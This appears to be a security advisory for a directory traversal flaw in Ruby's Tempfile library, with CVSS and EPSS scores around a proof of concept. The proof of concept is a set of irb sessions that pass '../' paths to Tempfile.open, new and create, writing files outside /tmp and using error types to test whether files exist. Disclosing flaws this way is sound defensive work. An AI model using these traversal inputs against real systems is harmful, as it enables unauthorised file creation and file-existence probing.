7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
HIGH
Availability Impact
NONE
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:L/Au:N/C:N/I:P/A:N
0.003 Low
EPSS
Percentile
64.7%
The Tempfile argument of basename
can use ../
without escaping.
Therefore, directory traversal may occur and unintended files may be generated.
[vagrant@localhost ~]$ ls .
[vagrant@localhost ~]$ irb
irb(main):001:0> require 'tempfile'
=> true
irb(main):002:0> Tempfile.open(['../../home/vagrant/', '.red'])
=> #<Tempfile:/tmp/../../home/vagrant/20180103-4697-uwqiop.red>
irb(main):003:0> `ls`
=> "20180103-4697-uwqiop.red\n"
irb(main):004:0> Tempfile.new("/../../home/vagrant/green")
=> #<Tempfile:/tmp/../../home/vagrant/green20180103-4697-1wbl81o>
irb(main):005:0> `ls`
=> "20180103-4697-uwqiop.red\ngreen20180103-4697-1wbl81o\n"
irb(main):006:0> Tempfile.create("/../../home/vagrant/blue") {|f| p f.path}
"/tmp/../../home/vagrant/blue20180103-4697-1udvlji"
=> "/tmp/../../home/vagrant/blue20180103-4697-1udvlji"
# It can not be created because suffix specifies a directory that does not exist.
irb(main):007:0> Tempfile.open(['hoge', '/../../home/vagrant/bar'])
Traceback (most recent call last):
9: from /home/vagrant/.rbenv/versions/2.5.0/bin/irb:11:in `<main>'
8: from (irb):7
7: from /home/vagrant/.rbenv/versions/2.5.0/lib/ruby/2.5.0/tempfile.rb:291:in `open'
6: from /home/vagrant/.rbenv/versions/2.5.0/lib/ruby/2.5.0/tempfile.rb:291:in `new'
5: from /home/vagrant/.rbenv/versions/2.5.0/lib/ruby/2.5.0/tempfile.rb:131:in `initialize'
4: from /home/vagrant/.rbenv/versions/2.5.0/lib/ruby/2.5.0/tmpdir.rb:126:in `create'
3: from /home/vagrant/.rbenv/versions/2.5.0/lib/ruby/2.5.0/tempfile.rb:133:in `block in initialize'
2: from /home/vagrant/.rbenv/versions/2.5.0/lib/ruby/2.5.0/tempfile.rb:133:in `open'
1: from /home/vagrant/.rbenv/versions/2.5.0/lib/ruby/2.5.0/tempfile.rb:133:in `initialize'
Errno::ENOENT (No such file or directory @ rb_sysopen - /tmp/hoge20180103-4697-utss0s/../../home/vagrant/bar)
[vagrant@localhost ~]$ ls
test
[vagrant@localhost ~]$ irb
irb(main):001:0> require 'tempfile'
=> true
irb(main):002:0> Tempfile.new("/../../home/vagrant/test/xxx")
Traceback (most recent call last):
8: from /home/vagrant/.rbenv/versions/2.5.0/bin/irb:11:in `<main>'
7: from (irb):2
6: from (irb):2:in `new'
5: from /home/vagrant/.rbenv/versions/2.5.0/lib/ruby/2.5.0/tempfile.rb:131:in `initialize'
4: from /home/vagrant/.rbenv/versions/2.5.0/lib/ruby/2.5.0/tmpdir.rb:126:in `create'
3: from /home/vagrant/.rbenv/versions/2.5.0/lib/ruby/2.5.0/tempfile.rb:133:in `block in initialize'
2: from /home/vagrant/.rbenv/versions/2.5.0/lib/ruby/2.5.0/tempfile.rb:133:in `open'
1: from /home/vagrant/.rbenv/versions/2.5.0/lib/ruby/2.5.0/tempfile.rb:133:in `initialize'
Errno::ENOTDIR (Not a directory @ rb_sysopen - /tmp/../../home/vagrant/test/xxx20180103-4783-1f4l2ox)
An unintended file may be generated in places other than the assumed directory.
It is possible to confirm the existence of the file by using the occurrence or not a directory error.
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
HIGH
Availability Impact
NONE
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:L/Au:N/C:N/I:P/A:N
0.003 Low
EPSS
Percentile
64.7%